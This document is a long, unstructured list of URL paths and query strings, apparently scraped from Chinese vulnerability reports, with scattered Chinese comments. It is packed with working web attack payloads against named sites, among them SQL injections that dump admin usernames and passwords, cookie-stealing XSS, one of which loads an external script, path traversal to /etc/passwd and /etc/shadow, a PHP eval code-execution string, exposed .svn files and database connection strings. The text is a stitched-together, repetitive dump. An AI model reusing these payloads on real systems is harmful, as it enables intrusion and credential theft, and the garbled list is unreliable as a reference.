/.svn/entries /.svn/entries /.svn/entries /.svn/all-wcprops /.svn/text-base/indexlist.jsp.svn-base /CRMA/ /CRMA/CRMA_RB_01_01.action /member/ui/qt/ /home/article!list.action?id=2fe680f62d300421012d3092f0d70005 /s/all?limit=10&p=%5B%7B%22t%22%3A%22high%22%2C%22name%22%3A%22x%22%2C%22year%22%3A2012%7D%2C%7Ba%3Aalert%28document.cookie%29%7D%5D&s=0&ref=sg_findfriend_highschool_search /fanBoxWidget?appId=29706&borderColor=;;width:expression%28if%28!window.x%29{alert%281%29;window.x=1}%29&characterColor=#333333&desc=1 /recruit/companyReg.jsp /boss/login.jsp /boss/ /news/class/index.php?catid=2 /admin.php /index.do /poker/intro.action /forget_psd.php?sid=e14aa9b65e0f4d05 14.0 /verify_fp.php?sid=e88bf0a11d2e7920 /message /fma/login.html?/fma/video/listoldvideo.jsp /fma/ /fma/showConfig.jsp /fma/diag/log4j.jsp /fma/diag/env.jsp /prog/register.php /prog/index.php /cgi-bin/cgi_imgproxy?url=http://0x000.tk /cn2/safe_school/url_query_index查询时官网链接,但在qq发送显示未知。 /cgi-bin/ptlogin?&u1=http://qp.qq.com/cgi-bin/cgi_imgproxy?url=http://0x000.tk /photo/p?kw=%B4%B4%D2%E2&tid=1817080100&pic_id= /service/driver_detail.jsp?DriverID=5171 / /wap/?a=header&from=&h=M&mcid=20-2 /user/select_cert_no.htm?email=10003@qq.com&pwd_type=Q /user/select_cert_no.htm?email=10003@qq.com&pwd_type=Q /Index.action?istimeout=1 www.19lou.com /user/blog/list?uid=xxxx www.19lou.com /user/blog/list?uid=2xxxx /test.js /mapp/vote/addComment.action /public/detail.php?id=4659 /html/xwzx/zxdt_info.asp?id=292 var /?ass="+escape(document.cookie);document.body.appendChild(img) /StudentCenter/Behavior/Mall/MyResource.aspx /StudentCenter/Behavior/Mall/ExchangeResource.aspx /e/register /e/register?gcsid=32e0a****隐藏若干位***3af12184&phone=180********9&s=确认 
/api.php?op=add_favorite&url=xx.oo&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271 www.zzstep.com /gao_neirong.php?tid=1326145 /taskadd.php?ID=2785%20%3Ciframe%3E%3C/iframe%3E /register/new/zone.aspx?fid=25 www.fehu.cn/news_detail.php页 /html/anli/,里面的客户案例,都存在同样的漏洞。而且这个CMS貌似还在收费! /member-sendMsg.html /index/index.action /getProductDetail.action?software_id=0aff22e4-e73c-490b-900f-964924216c3b /admin/ / / /common/common_info.action?wid=201206061647101009 /common/common_info.action?wid=201206121017281106 /common/common_info.action?wid=201205251136581055 /common/common_info.action?wid=201203290850081045 /common/common_info.action?wid=201201191129341000 /common/common_info.action?wid=201111081709461008 /common/common_info.action?wid=201109101627471006 /common/common_info.action?wid=201109101627471006 /common/common_info.action?wid=201207050924351000 /common/common_info.action?wid=201112021126461037 /common/common_info.action?wid=201206111446131088 /article/article!detail.action hyxb.sz.tsinghua.edu.cn/ROOT /这个站点 /index.php?s=/article/show/id/{${phpinfo() /index.php?s=/article/show/id/{${eval($_POST[cmd]) /index.action /cgi-bin/mmsupport-bin/readtemplate?uin=&stype=&promote=&fr=&lang=zh_CN&ADTAG=&check=false&t=w_password_phone&method=mobile /game_class.php?mid=4&sj=828&yqid=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg /phonelist.php?c=E&do=one&sj=SH8010C&yqid=1&jx=12 /hits.php?fid=8049 
//lottery/userzj.action?username=15538228&lottery=300 /k2x/page/login/login.php /k2x/page/profile/avatar.php?aui=dXNlcl9pZD00NDI2MyZjaGFubmVsX2lkPSY= /k2x/smarty/templates/avatar/81289_20_20.php /k2x/page/login/login.php /cgi-bin/common/cgi_view_album?singleurl=1&uin=1341413415&albumid=V10fl8eT3mFzob&t=0.10085723901044841&verifycode=&question=%E5%AF%86%E7%A0%81%E6%98%AF%EF%BC%9F&output_type=json&refer=qzone&plat=qzone&json_esc=1&g_tk=5381&answer= /frg.php?sid=s1 /tv/2012zt/xyjztzh/ / /pwset/ / /Java/jviewer.jnlp /news/detail.aspx /index.php?app=order&act=check_coupon&coupon_sn=1&store_id=1 /index.php?app=order&act=check_coupon&coupon_sn=1&store_id=1%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%280x7e,0x27,%20sh_member.user_name,0x27,0x7e,%20sh_member.password,0x7e,0x27%29%20from%20sh_member%20limit%200,1%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1 /index.php?m=member&c=index&a=register&siteid=1 php:578 /WebReport7/ReportServer?op=fs_load&cmd=fs_signin&_=1347302374226 / /WebReport7/ReportServer?op=resource&resource=http://www.baidu.com/ /WebReport7/ReportServer?op=resource&resource=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /comment.php?types=3&sj=&yqid=0&sid=1341%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20version%28%29%29%20from%20information_schema.tables%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23-- /bfy_jm.asp?id=317840x /continuum/security/login.action /show.action?op=Area.index&modelId=22 /www.100e.com.rar /www.100e.com.rar /Unicom114/index.html /HBE/Hotel/WebHotelEntranceAction.action /flow/Auth.aspx /v/home/Default.aspx www.js165.com/v/home/newsinfo.aspx?nid=2439432 newslist.asp?NodeCode= 
/myspace/voice_show.asp?ID=313921&Name=%22%3E%3CScRiPt%20%3Ealert%28%22magic%22%29%3C%2fScRiPt%3E&ProductID=2953&ProductName=%20%20%810%884%810%870%810%872%810%867%A1%C0%A8%BA%810%887%810%844%810%887%810%8A7%28%810%874%810%898%810%872%A8%BA%810%864%810%859%810%877%810%883%29%282009%810%872%A8%BA4%810%888%810%870%29 /myspace/某某某(用户名) / /card/exchange/index?keyWords=1234′ /profile/mine /profile/"+c_userid+"/icard /card/exchange/api/invite?cardUid=xxxxxx&ajax=1 /xsstest.php /shangxi/huikancon_article.php?cls=35&class_id=113&article_id=168 /musiclist.aspx?musictype=1&searchType=1',1,1--&searchKey= /musiclist.aspx?musictype=1&searchType=1',1,1;select--&searchKey= /musiclist.aspx?musictype=1&searchType=1&searchKey=%E5%AD%99%E4%BF%AA /musiclist.aspx?musictype=1&searchType=1&searchKey=%E5%AD%99%E4%BF%AA%27,1,1,1-- /ktv_new/in_ktvroom.aspx?serverid=66&userid=wangjing01 14.0 /address/remove/279129 修改其中的id即可删除别人保存的地址 www.jiuxian.com /topic/3znq/hyzc/index.html /index.php/crowdtest/game/showGame(需登陆) /dianwoba/grid/c.jsp?t=3 /dianwoba/product/pd.jsp?pid=900268 /dianwoba/ipforward/enter.jsp www.7road.com /nsedoc/scripts/http-methods.html /nsedoc/scripts/http-methods.html /nsedoc/scripts/http-methods.html /nsedoc/scripts/http-methods.html /o:microsoft:windows //WebSource/WebSource.aspx?Source=eqf&SourceSunInfo=408293918256024A0A0A1AGabOlS&Url=http://www.wooyun.org /jx3/zuimei/index.php?act=show&uid=4200 /view.php?id=796 /dianwoba/grid/liansuo.jsp?lid=22 /ssc/t.jsp?userId=16128627&lotteryId=300 /svqd/jsp/svqd/zhuce/zhuce.jsp /svqd/ /api/error_report/show?source=ipad /phonelist.php?do=one&jx=11 /space/1464 /subject/kn2010/ /cjc/editor/down.jsp?file=../../../../../../../etc/shadow /data/avatar/011/14/10/08_avatar_small.jpg/1.php zhubajie.com action /member/index.php?uid=q18682078086&action=article /vuldb/ssvid-20949 /e/.svn/entries /.svn/entries /jsp/pvbi/.svn/entries /.svn/entries /.svn/entries /.svn/entries /.svn/entries / / / /mine的Board里可以直接嵌入脚本代码。 
/Cun/CodeQuerryQuestion.aspx?questionID= / /web/Uploads/ / /sso/sys/main.action / /info_news.php?id=1364 /topics-5396.html /phone!getPhoneModel.action?modelEntity.prefix=M&brand=ZTE&brandCN= www.anyview.net www.celedial.com www.datoutie.com www.labi.com www.yitongbu.com http://www.site.cn:85/report/download.php?pdf=../../../../../etc/passwd /taobaoSearch.action?keyword=wooyun.org /study/bilingual/1554271.shtml在网友评论处 /images/logo.gif /201002/elantrano1/blog.php?userid=2332992 /201005/dh/d.php?zpid=307975 /wp7/view-id-85 /wp7/view-id-85 /wp7/view-id-85 /wp7/view-id-85 /wp7/view-id-85 /databak_fa1fb2 /Views/arts.aspx?ez=3 /search?client=aff-cs-360se&forid=1&ie=utf-8&oe=UTF-8&q=search%22+href%3D%23+onerror%3Dalert%28%27wooyun.org%27%29%3B%3E%3Cimg+src%3D%22%23 cehome,则执行跨站代码,如果不是默认主页,当访问http://i.firefoxchina.cn页面时,依然会执行跨站代码。 /huaiyun/mamashow_single.php?id=13 /api/getthread.php?cut=16&limit=6&tid=65024 /shopsystemF/checkLogin.action /login.php?url=http://club.weibo.com&entry=daren /cgi-bin/mail_spam?action=check_link&url=javascript:alert%28document.cookie%29 /TicketCard/login.action /?controller=person&uid=277827072 /website/Login.action /billing/billaddress-baid-12467-edi-1 /boss/index.jsp),左侧信息查询链接均采用GET方式获得用户数据,且没有对用户ID进行判断。 /index/list-fid-5-order- /index/list-fid-5-order- /pages/channel/actLoginAction.action /vip/ /index.php /xx.js /Admin/AdminPanel.aspx /JSP/ /?qa= /thread-index-threadid-141832-page-21.html / /logs/187251211.html /login!checkPw.action /bookshop/pagelayout.action?nodeID=272&releaselibID=3899&isceb=1 /bookshop/pagelayout.action?nodeID= /login.action?error=2&j_username=1&checkUrl=/member/member!input.action&url=null /books/bookslist.jsp /books/bookssales.jsp /media/medialist.jsp /common/playlist.jsp?url=&newstype=4&id=3896&nodeid=132&pubcompanyid=0&siteid=0 / www.goldmail.cn/about/hotspot/hotspot_detail.php?ID=-137+union+select+1,2,concat_ws www.goldmail.cn/about/news/news_detail.php?ID=-142+union+select+1,2,concat_ws 
/cgi-bin/mmsupport-bin/showresetpwd?uin=&stype=&promote=&fr=&lang=zh_CN&ADTAG=&check=false&t=w_password_phone&phone=1%22style=%22x:expression%28alert%28URL=1%29%29&country=A86&getmethod=web / ad.goodbaby.com/ad_alt_click.php?z=-6176+union+all+select+concat_ws /360doc.rar /pages/smb/products.asp?c=3 /pages/article-detail.asp?result=school&d=157 /pages/cms/upload.asp /,同理还有http://bbs.tp-linkmobile.com.cn。。。后面就不继续了,希望厂商还是控制下目录权限吧,好多个应用放到一个站。 /tips/goodbaby/stepbystep/Step_3.php?ContentKeyID= /album/album_album.php?albumid=4snme /cgi-bin/mail/redirect.cgi?http://www.wooyun.org /yesasia/loadframe.cgi?url=http://www.wooyun.org /?ie=utf-8&job_cit=None&job_dat=0_4294967295&job_edu=1_1&listType=0&oe=utf-8&rn[]=1&wd=%E8%AF%B7%E8%BE%93%E5%85%A5%E8%81%8C%E4%BD%8D%E5%90%8D%E7%A7%B0 /server-status /p/Searchpost/index?education=1%22%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C%2fScRiPt%3E&intime=[2012-09-15T00:00:00Z%20TO%20*]&intime_id=1&page=15&q=&stime=0 /blog/5064513 /201102/lhcs/list_e.php?id=518604 /JdVote/TradeComment.aspx?ruleid=订单ID /watch/show.php?mod=category&act=index&catid=6 /bbs/Admin/Label.asp?do=edit_label&realdo=edit&file=besttopic.tpl&folder=/Dv/ /feedback.php页面的contact和contactus参数存在漏洞。 /ihsdata/存在目录浏览漏洞 /ihsdata/company/ /ihsdata/meeting/ /mlocsoIndex.action /mlocsoIndex.action /phpinfo.php /chepiao/%3Cvideo%3E%3Csource%20onerror=javascript:document.write%28String.fromCharCode%2860,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62%29%29%3E.htm /chepiao/%3Cvideo%3E%3Ciframe%20onload=javascript:document.write%28String.fromCharCode%2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,49,46,109,97,103,105,99,120,115,115,46,115,105,110,97,97,112,112,46,99,111,109,47,120,115,115,46,106,115,34,62,60,47,115,99,114,105,112,116,62%29%29%3E.htm /club/admin/upload/1318226996487.jpg,习惯性地扫了下目录,爆出fckeditor编辑器,于是,各种漏洞一阵轰炸,发现可以遍历目录 
/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ /acegilogin.jsp /Modules/occ/pages/member/top_member.jsp /Modules/admin/business/pages/domain_audit_upload.jsp /Modules/admin/business/pages/domain_info_admin_password.jsp查询管理密码 /Modules/admin/product/pages/notify_modify.jsp /Home_noPassword.aspx / /qqmail/domainadmin.do?method=login / /index.php /g2/login.action / /cgi-bin/login / /system/login.do / /users/to-login/ /cgi-bin/notebooklist?ID=4894 /cgi-bin/feedbackinit?ID=5806 /Modules/agent/serv/pages/ /e/admin/index.php /g2/login.action postgresql://db.slot1.cth.155438.s.**.net:5432/cth-slot1 /mydns/recordsList.do /mydns/mydnsop/mydns_add"/ /mydns/mydnsop/mydns_update"/ /mydns/mydnsop/mydns_delete"/ mysql://61.155.152.**:3306/pdns?useUnicode=true&characterEncoding=utf-8 mysql://202.10.73.**:3306/pdns?useUnicode=true&characterEncoding=utf-8 mysql://202.10.73.19:3306/mydns?useUnicode=true&characterEncoding=utf-8 /search?lm=2&word= /job?jid=11111111111111&q=1111111111 /wp-includes/js/swfupload/swfupload.swf?movieName=%22 /rest/2.0/pim/contacts?method=add&app_id=20 /wp-includes/rss-functions.php /apc.php /.svn/entries /2012/09/16/zero-day-season-is-really-not-over-yet/ /money/view/show.php?t=bank&c=show_notice_detail&id=87703 /register/registerAction!invite.action /blog/5052230 /storage/login/login.action /WebSuperMarket/ /mutualpoint/ /sftcard/ /images/ /webio/ /web/ /SgcLMS/ /SgcLMS/authorization/learner/learner!gotoValidateInfo.action / / / / /admin/login.php /bank/ /bank/jybank/index.php /query/query.php /没发现什么问题 /brand.php?trade_id=54 /pass/register /pass/verifyPhoneRegTicket?phone=手机号码&ticket=验证码 /account/reg/mobile.htm注册支付宝时,会对手机号码做是否已经注册的验证,但是没有限制次数,导致可以在段时间(几分钟)内枚举出大量已注册的手机号,已经注册但未激活的手机账号,已经注册且和淘宝关联的账号(及账号的部分昵称) /upload.jsp /bbs/test.jsp /admin/目录下存在存在一个编辑器有安全隐患 
/manage/ /manage/upfile.htm /new_exhibit/exhibit.html?id=1525 /console/ /sdxxw/login.action /query/Letvdiancard.jsp?cardnum=122111111111&cardpwd=99999999 /issp/pages/login.action /index.php?p=2 /index.php?/default/login/login /ajax/address.php?action=address_remove&id=850270 /test/webgame/index.action /coboportal/portal/itservice.ptview?funcid=showGSWZInfoLink&infoSortId=52802&infoLinkId=13962&viewJsp=../../WEB-INF/web.xml /index.do /index.do /.svn/entries /zlZLE2P /myapp/login.action /wiki/%E3%80%90QQ%E7%99%BB%E5%BD%95%E3%80%91%E4%BD%BF%E7%94%A8Implicit_Grant%E6%96%B9%E5%BC%8F%E8%8E%B7%E5%8F%96Access_Token /oauth2.0/authorize?response_type=token&client_id=216028&redirect_uri=http://open.z.qq.com/moc2/success.jsp&scope=get_user_info,add_one_blog,do_like,add_t,list_album /svn/trunk/draftCode/oauth2_client_side_side_effect/qq_oauth2.php /system/findPassword.do /wp-includes/js/swfupload/swfupload.swf?movieName=%22 /blog//wp-includes/js/swfupload/swfupload.swf?movieName=%22 /分站注册用户,用户后台可上传数据,但是上传数据过滤是用js过滤的,用firefox修改下过滤上传成功。见图 /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /stardy/Login.action /coboportal/ /coboportal/wafplatform/login.jsp /coboportal/wafplatform/portletmanage.do / /album/js/album.js 
/120920/14/U1112845528/55e04373cab5931a.jpg /album/album_photo.php?photoid=69a5aa#viewpic /album/album.php /special/innotonglianzhan.action /HunanCity/ep/index.action?id=107 /showSrv.action?id=309392&catalog=%E5%9F%8E%E5%B8%82%E9%A2%91%E9%81%93 /sale/web_index.action?sptype=2 /shop/shopMobile_listMobile.action?curPage=80 /base/permission/login/login.action oracle:thin:@ sqlserver://10.11.11.111:1433;DatabaseName=crmdb sybase:Tds:10.11.11.222:5000/crmdb?charset=utf8;SELECT_OPENS_CURSOR=true;language=us_english mysql://127.0.0.1:3306/crm09 /crbt/queryStarAreaDetail.action?ringParam=4854 12.0 /hyinfo/action/FwcszsAction_index?type=1 /crossdomain.xml /cas/login /console/ /index.php?p=2 /shop/user.php?act=profile /others/xt/name.php /user/login.action jtds:sqlserver://115.***.***.29:1493/dxmms /editGroup.do /myfriendlistx.do#item_6 / /hyinfo/action/FwcszsAction_hyblzxx /hyinfo/action/FwcszsAction_hyblzxx /backend.php/interface/getdoc/?path=file/src/2012-09-21/xxx.doc&name=xxx.docx /adfront/click?u= /yiyun/security/toLogin.action oracle:thin:@127.0.0.1:1521:ebackup /PPerson/JJPerson.aspx?JID=24279 /tech_support/email/user/ufeedback.asp?idcode=【工单编号】 /fillweb/kcoin/setPayPwd.jsp?passport=%3Cscript%3Ealert(/valo/)%3C/script%3E /fillweb/kcoin_error.jsp?errorMessage=%3Cscript%3Ealert(/valo/)%3C/script%3E /index.php?appid=4&tid=28 /wiki/index.php?doc-create /yycs/gamequiz/index.php?act=showCard&pid=12024 /sedm_core/ /ivod/i/home/VideoType.aspx?cid=88&typename=%E6%97%85%E6%B8%B8 /TrainQuery/iframeSellTicketStation.jsp /TrainQuery/iframeSellTicketStation.jsp /Dzsw/action/JgxxAction_hwyjl /index.php /bbs/ /bbs/viewthread.jsp /bbs/faq.jsp?action=message&id=24 /log /WooYun-XXXXX/ /regionTempAction.do?method=toForwardFindPasswordStyle /regionTempAction.do?method=resetPassword&idtagCard=用户ID值&authcode=Go8K7yp4TWy&rtEmail=邮箱地址 /content/1060 /1378148/ /thread-676-1-1.html /pc/login!chekLogin.do /book/list/%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28document.cookie%29%3C%2fScRiPt%3E 
/1378130/favorite?sk= /bang/search?keyword=1%3C%2ftitle%3E1%3CScRiPt%20%3Ealert%28/xss/%29%3C%2fScRiPt%3E /booklist/list/?beingsId=1034563&pi=0&sub=1%22%3E%3C%2ftitle%3E1%3CScRiPt%20%3Ealert%28/xss/%29%3C%2fScRiPt%3E /bang/?pi= /bang/search?keyword=1%3c%2ftitle%3e1%3cScRiPt%20%3eprompt%28910644%29%3c%2fScRiPt%3e /index/list?id=1%3c%2ftitle%3e1%3cScRiPt%20%3eprompt%28913007%29%3c%2fScRiPt%3e&type=tag /lianbo/i.php /.svn/entries /book/.svn/entries /book/images/.svn/entries /book/images/android/.svn/entries /download/.svn/entries /images/.svn/entries /lianbo/.svn/entries /lianbo/appdown/.svn/entries /lianbo/images/.svn/entries /lianbo/images/android/.svn/entries /lianbo/images/android_hd/.svn/entries /lianbo/images/ipad/.svn/entries /lianbo/images/iphone/.svn/entries /lianbo/images/wp7/.svn/entries /lianbo/images/wp8/.svn/entries /logs/.svn/entries / /playerInfo.php?id=4 /eoms4/portal/login.action /Login.aspx /index.php?c=fashion&a=fashion_detail&id=1 www.eset.com.cn /lixiaofeng/contentbowen.php?id=5 /admin/.svn/entries /admin/scripts/fckeditor.266/editor/.svn/entries /sql/.svn/entries down.17u.com/2010/pdf/index.asp?pdfaddr=133-1378.pdf down.17u.com/2010/pdf/index.asp?pdfaddr=index.asp down.17u.com/2010/pdf/index.asp?pdfaddr=pdf.xls / / /opencom/picture/fav/upload?app_id=314406&descript=标题&source_url=http://tieba.baidu.com/p/10000 /static/widget/common/header/images/logo_0577c8f4.png&callback= /hlogin.action /vsap/index.jsp /vsap/cpsp/login.jsp /vsap/Operator/OperatorLogin!toLoginPage.action /vsap/mobile/loginAction!login.action com:3306 /bolt/home/agree.htm www.xxxx.com"/ /bolt/member/preEditMember.htm /movie/show.php?id=7759 /.bash_history / /showFeedback?pageNo=23 /feedback/ /images/ www.yonyou.com /news/pages.php?id=70 /resources/uploadify.swf //doUpLoadToTemp.jsp /resources/images/cancel.png /resources/images/liulan.png /uploadTemp/2012-09-21/"+value+ /rr.js /这个网站是dota2的官网,我们进行扫描,后台地址为http://dota2.replays.net/hero/login.aspx aspx?id= 
/cgal/index1.aspx),教务系统有535所学校在用,貌似这个系统有2个版本,有一个较新的不行,但是大多数都是老版本,可以成功利用该漏洞对服务器攻击,差不多可以影响上百所高校教务系统吧。 /oauth/2.0/authorize?scope=super_msg&response_type=token&client_id=RCKbWANx8KewnXs9rwGWFtZV&redirect_uri=http://lvtu.qunar.com/mobile_ugc/web/album.htm?albumId=4228 /oauth/show?which=AuthorizePage&which=ConfirmPage&response_type=token&client_id=100244931&redirect_uri=http%3A%2F%2Flvtu.qunar.com%2Fmobile_ugc%2Fweb%2Falbum.htm%3FalbumId%3D4228&scope=get_user_info,add_topic,add_one_blog,add_album,upload_pic,upload_pic,add_share,add_t,add_pic_t,del_t,get_repost_list,get_info,get_other_info,get_fanslist,get_idollist,add_idol,del_idol,get_tenpay_addr&src=1 /mobile_ugc/web/album.htm?albumId=4228存在xss漏洞) /f/commit/share/openShareApi?title=title /static/images/imgshare/preview_img_small.jpg&url=http://www.wooyun.org /f/commit/share/openShareApi?title=title&desc=&url=http://www.wooyun.org',videos:{"video_r":"","video_s":"","pkey":""}};alert("url");var /cart/ /login.html /forget/send_way /forget/send_way /forget/verify/mobile / /mobile/index/topic?id=2 /mobile/detail/8888888%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C!-- /forum/ShowContent/ajaxNewComment?groupId=60&subjectId=82016&content=%3Cimg%20style=%22border:10px%20solid%20red;position:fixed;top:0px;left:0px;width:9024px;height:5100px;%22%20onmouseover=%22alert%28%27baba%27%29;alert%28document.cookie%29;%22%20/%3Ea%E5%95%8A%E5%93%A6%E5%8F%91%E6%96%87%E5%8F%91%E6%96%87%E5%AE%89%E6%85%B0%E5%AE%89%E6%85%B0%E6%B3%95%E5%98%8E&replyToInfoStr=&position=#pageOffset=2&layers=1 /search.php?keywords=a%cf'+or+1=1 /mo_service.shtml?path /mo_service.shtml?rtx/download/AppIMWatch.txt /mo_service.shtml?school/001.doc /l4yn3/ /ugg/article/details/3953137 /captcha.php / /customer/ /sms_admin/ /sms_admin/admin.php?what=1_1_1_1 /groupBuy/listOrderManage.jsp /login.jsp /j_spring_security_check?j_password=a&j_username=admin /j_spring_security_check?j_password=a&j_username=admin /62%CE%B1/index.asp?id=flv /news.php?id=5 
/s/nl.php?act=search&k=8 /admin/即可直接进入吉林互联星空管理后台,任意发布内容和删除内容。 /shoplist.aspx?RackCode=A06 /shoplist.aspx?RackCode=A06%27%20and%20%271%27=%271 /shoplist.aspx?RackCode=A06%27%20and%20%271%27=%272 / /562.html /getOriginal?callback=jQuery16109319937340915203_1348642196756&q=T7n6r0L&_=1348642200976 /T7n6r0L /getOriginal?callback=jQuery16109319937340915203_1348642196756&q=T7n6r0L&_=1348642200976这个地址返回的内容也能够判断出,传入到callback的参数就是我们voteUrl的值。 /t/cssjs/439756/script/page/home.js /getOriginal not(.processed) /getOriginal请求资源。在这一步中执行我们的js代码。 /cgi-bin/format/view.cgi?id=20 / /PmtListFaq.aspx?QaClass=3 / / / /几个管理员的密码: /,有些账户也是能登陆的,但是http://union.lenovomobile.com/没找到后台,所以就没深入了。 /,这个站我想客流量也挺大的,怎么还有明显注入呢? /www/mb/js/mi.TalkListRich_120921a.js这个js文件中有如下代码: /www/mb/js/mi.Music_120821.js文件中。 /url_player.html?song=%esong%&singer=%esinger%&url=%songurl%&stream=0&songID=0 10px /survey_robot/db.asp /survey_robot/nimda/login.asp /info/yp/product.php?prowhere=1 /info/member/list.php?modelid=10 /dz15/home.php?mod=space&uid=1177871&do=blog&id=7279 /xxx.jpg","extraData":{"smallest":{"w":119 /x.jpg\ /ajax/gochklogin.ashx?Email=-1%27%20or%2032%20%3d%20%2730&Pwd=123456&r=0.6934755546958449 /showfit.aspx?GdsID=%22%20onmouseover=alert%28document.cookie%29%20// //mormhweb/ggxxfw/wbyyzj/201105/t20110529_1905.jsp?height=661 /Dzsw/action/CaptcaAction_validateQueryCaptca /Dzsw/action/JgxxAction_index?type=1 /ewebeditor/admin/default.aspx /webbaaliyun/jumpFindPwd.action /search/list.html?k=%3Cscript%3Ealert%281%29%3C%2Fscript%3E /union/admin/login.jsp /service/tickets_inquires/tickets_and_inquires.shtml /ex/savefile?files=[{name:%27273%32.rar%27,cid:%2773848F3D47DAC34A23F7B860DD90B9A9BD8BA32B%27,gcid %27%27,url:%27http://dl1.c6.sendfile.vip.xunlei.com:8000/2734%252Erar?key=953c13cdf61ed238b0d1813c86e8e941%26file_url=%252Fgdrive%252Fresource%252F6B 1662338302}]%22%29%29;eval%28%28%22alert /weibo/application/upload/2830631087/e71409fe5075a0c5888c3d6e50b298c8.txt /manager/html/ /upload.php 
/ProductList.htm?Cid=606&rypId=608&zhId=605&mid=100&Keywords=%22%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3B%3E+%2Ctitle%2Cbrand%2CcloumnName%2Ckeywords%2CarticleRuleTitle&searchlist=1&isKeyCommendClick=1&topKeywords=%22%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3B%3E+&x=39&y=19 /phone.php后将会自动显示手机的 /account/reg/email.htm /GetSomeomeDoingList.do?userId=他的人人ID&curpage=页码从0开始计数 /business/v3/index.html com.xianguo.book/shared_prefs/xg_book_config.xml com.xianguo.pad/shared_prefs/config.xml.xml /manager/html /labs/tools/pentest/reduh /jspspy/reDuh.jsp /jspspy/reDuh.jsp /campus/job_list.php?t1=campus&positionId=1 /campus/job_list.php?t1=campus&positionId=1 /campus/job_list.php?t1=campus&positionId=1 /campus/job_list.php?t1=campus&positionId=1 /display.action /aaa/selfservice/selfservice.shtml?return_url=http%3A%2F%2Fln.vnet.cn%3A9008%2Fweb%2Fwebrlogin.do&flag=1 /myinfo.jsp /product_list.jsp?searchType=search /myinfo.jsp /agency/auth/applyStep2?agencyType=1 /AdminiStrator/MIR_MainTech_List.aspx。我想有教师列表为什么不能有管理员列表? 
/AdminiStrator/MIR_Admin_List.aspx /.svn/entries /fckeditor/.svn/entries /.svn/text-base/index.jsp.svn-base /doc/.svn/entries /forum.php /home/error.php /member/reset_password.php?auth=70adcfad448d76c0b70480d787f734&id=2544380&t=1348903015 /member/reset_password.php?auth=70adcfad448d76c0b70480d787f734&id=2544380&t=1348903015 /1844269/ /1 /member/forgot_begin.php /en/uploadfile/test.txt /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php /museum/index.html /pIQKKz /robots.txt/admin.php /NPELS /NPELS/CommonService.asmx /NPELS/CommonService.asmx /NPELS/CommonService.asmx/GetTestClientFileList?version=1 /NPELS/CommonService.asmx/GetTestClientFileList?version=../../ /npelsv/editor/editor.htm /WebAdmin/NewsDetail.php?ID_News=4320 /WebAdmin /guild.do?method=enter_addguild /index.php?task=cms&id=-1+%2F*!UNION*/+ALL+/*!SELECT*/+1,2,3,4,GROUP_CONCAT%28TABLE_NAME%29,6+FROM+INFORMATION_SCHEMA.TABLES+/*!WHERE*/+TABLE_SCHEMA=DATABASE%28%29-- /mobile?tg=10046&from=home&adtag=profile_mobile /reg_ok.asp?id=46 http://app.ps.cn/web/webapp!openIndex.action /m/index.php?a=quit[/img /shtml/mobile_01.jsp xm.gov.cn /huabei/score.action /ic/login.jsp /ic/user/logonForm.action?url=/login.jsp /agentlist.asp /admin /login/是一个用户登录的页面,但是这个页面的中的背景图片是动态调用得到,具体URL是 /login/image.cfm?x1=0&y1=0&x2=1&y2=1&format=&width=../&height=161&assetid=73806%20and%201=@@version /registration/getinfo/detailinfo.php /lxcali.action /question.php /resin-doc/viewfile/?contextpath=&servletpath=&file=/WEB-INF/web.xml /WEB-INF/web.xml /WEB-INF/web.xml /servlet/DisplayChart?filename=index.jsp /servlet/DisplayChart?filename=index.jsp /tabid/47316/ctl/Edit/mid/118574/InfoID/378661/Default.aspx /files/meizhuang.php?typeid=49 /shop/sales/html/order_check.html?order_id=132043 /MobileApp/soft/findMobileApp.action?ksoftid=2542 /soft/info.action?softId=3843 /music/center/loadCenterIndex.action /sxltq1/front/card.action /web/Search/productDetail.do?product_id=4073 
